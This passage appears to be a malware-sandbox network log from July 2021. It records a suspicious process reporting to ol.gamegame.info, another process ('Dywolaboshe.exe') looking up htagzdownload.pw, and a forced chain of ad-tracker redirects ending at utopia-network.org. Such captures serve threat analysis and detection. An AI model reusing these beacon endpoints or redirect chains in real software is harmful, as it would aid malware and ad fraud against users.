                                                                                          date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          content-type: image/x-icon
                                                                                          content-length: 0
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: cddadc715f82986696573165788fc95e
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ol.gamegame.info
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          Response
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          104.21.21.221
                                                                                          ol.gamegame.info
                                                                                          IN A
                                                                                          172.67.200.215
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://ol.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ol.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=w7fWV5XU%2FF8%2Fw%2BO%2B7JWLAM67YEElplJ0ChM9VyRZVidKjo6TVFOLuRAaSI0UUm4F1eU0QPreK0Q6RQow9m4tWGgAoZBRebxv6sfd%2B4Wmhsjar4ef6cBDjb%2F600BprA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5322059b44be9-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          trk.lemon-ade.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          trk.lemon-ade.site
                                                                                          IN A
                                                                                          Response
                                                                                          trk.lemon-ade.site
                                                                                          IN CNAME
                                                                                          uvg0u.bemobtracks.com
                                                                                          uvg0u.bemobtracks.com
                                                                                          IN A
                                                                                          3.210.231.22
                                                                                          uvg0u.bemobtracks.com
                                                                                          IN A
                                                                                          54.210.38.13
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://trk.lemon-ade.site/go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          3.210.231.22:443
                                                                                          Request
                                                                                          GET /go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: trk.lemon-ade.site
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Set-Cookie: bemob-uniq-visit:9f5655c8-33b8-4e91-aa0b-2e057393cf74=1; Domain=trk.lemon-ade.site; Path=/; Expires=Sat, 10 Jul 2021 23:05:14 GMT; HttpOnly; Secure; SameSite=None
                                                                                          Set-Cookie: bemob-click-id=4pSJha3F1KRcn6wpv7yLuR; Domain=trk.lemon-ade.site; Path=/; Expires=Sat, 10 Jul 2021 23:05:14 GMT; HttpOnly; Secure; SameSite=None
                                                                                          ETag: W/"123-qyikHV+voKx324W6bqPnUDXXWLg"
                                                                                          X-Response-Time: 9.043ms
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Cache-Control: no-cache
                                                                                          Strict-Transport-Security: max-age=0; includeSubDomains
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://x1.c.lencr.org/
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          104.73.131.204:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: x1.c.lencr.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Content-Type: application/pkix-crl
                                                                                          Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
                                                                                          ETag: "5f518b98-2cd"
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Sat, 10 Jul 2021 00:05:14 GMT
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Length: 717
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          afflat3d1.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          afflat3d1.com
                                                                                          IN A
                                                                                          Response
                                                                                          afflat3d1.com
                                                                                          IN A
                                                                                          69.172.200.185
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://afflat3d1.com/lnk.asp?o=21072&c=918277&a=491407&k=4021AFAD236A78C07FA6ADBA14948471&l=22139&s1=4969ebaf&s2=4pSJha3F1KRcn6wpv7yLuR&s2=4pSJha3F1KRcn6wpv7yLuR
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          69.172.200.185:443
                                                                                          Request
                                                                                          GET /lnk.asp?o=21072&c=918277&a=491407&k=4021AFAD236A78C07FA6ADBA14948471&l=22139&s1=4969ebaf&s2=4pSJha3F1KRcn6wpv7yLuR&s2=4pSJha3F1KRcn6wpv7yLuR HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: afflat3d1.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Object moved
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 200
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=20
                                                                                          Cache-Control: private
                                                                                          Location: https://kodim.rdtk.io/6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125
                                                                                          Set-Cookie: mb_21072_SS=AF=491407&AC=716898125&CS=717389532; path=/; SameSite=none; Expires=Tue, 7 Sep 2021 19:5:16 GMT<br />; Secure
                                                                                          Set-Cookie: I_SS=716898125; path=/; SameSite=none; Expires=Mon, 7 Jul 2031 19:5:16 GMT<br />; Secure
                                                                                          Set-Cookie: I=716898125; expires=Mon, 07-Jul-2031 04:00:00 GMT; path=/
                                                                                          Set-Cookie: mb%5F21072=AC=716898125&CS=717389532&AF=491407; expires=Tue, 07-Sep-2021 04:00:00 GMT; path=/
                                                                                          Set-Cookie: ASPSESSIONIDSWSBTCCB=MNOHBCGAGKCJICNKCFMIHABL; secure; path=/
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-DIS-Request-ID: 6f20d23f2e756a25d1c773a7dd8f95cd
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://trk.lemon-ade.site/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          3.210.231.22:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: trk.lemon-ade.site
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iceanedy.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          Response
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          172.67.214.126
                                                                                          iceanedy.com
                                                                                          IN A
                                                                                          104.21.86.39
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          kodim.rdtk.io
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          kodim.rdtk.io
                                                                                          IN A
                                                                                          Response
                                                                                          kodim.rdtk.io
                                                                                          IN CNAME
                                                                                          rdtk.io
                                                                                          rdtk.io
                                                                                          IN A
                                                                                          23.105.36.164
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://kodim.rdtk.io/6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          23.105.36.164:443
                                                                                          Request
                                                                                          GET /6094459776ff1b0001edbe7d?sub2=491407&ref_id=716898125 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: kodim.rdtk.io
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx/1.19.9
                                                                                          Date: Fri, 09 Jul 2021 23:05:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 54
                                                                                          Connection: keep-alive
                                                                                          Location: https://www.utopia-network.org/
                                                                                          Set-Cookie: redhash=NjBlOGQ2MzJmOTJjYTAwMDAxNDZlNjJlfDB8NjA5NDQ1OTc3NmZmMWIwMDAxZWRiZTdkfHwxMzJiMGM1OC1lNTc5LTRhMWQtYjYyOC01ZDY4NzQyNDk4ZWJ8MTYyNTg3MTkyMg==; Path=/; Domain=kodim.rdtk.io; Expires=Sat, 09 Jul 2022 23:05:22 GMT; SameSite=None; Secure
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.utopia-network.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.utopia-network.org
                                                                                          IN A
                                                                                          Response
                                                                                          www.utopia-network.org
                                                                                          IN CNAME
                                                                                          utopia-network.org
                                                                                          utopia-network.org
                                                                                          IN A
                                                                                          162.0.209.78
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET / HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 25 May 2021 15:29:42 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 11036
                                                                                          content-type: text/html
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/css/styles.min.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /css/styles.min.css HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 563
                                                                                          content-type: text/css
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/css/social-links.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /css/social-links.css HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 04 May 2021 10:41:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 26749
                                                                                          content-type: text/css
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/logo.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/logo.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 2107
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/sidebar__bg_right.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/sidebar__bg_right.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 71387
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/close.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/close.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 188
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/download.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/download.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 309
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/button__ellipse.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/button__ellipse.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 49370
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/main-screen__video-plug.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/main-screen__video-plug.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 199844
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/title_right.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/title_right.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 23128
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_1.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_1.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: none
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 22920
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_2.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_2.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 22133
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_3.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_3.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 25771
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_4.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_4.png HTTP/2.0
                                                                                          host: www.utopia-network.org
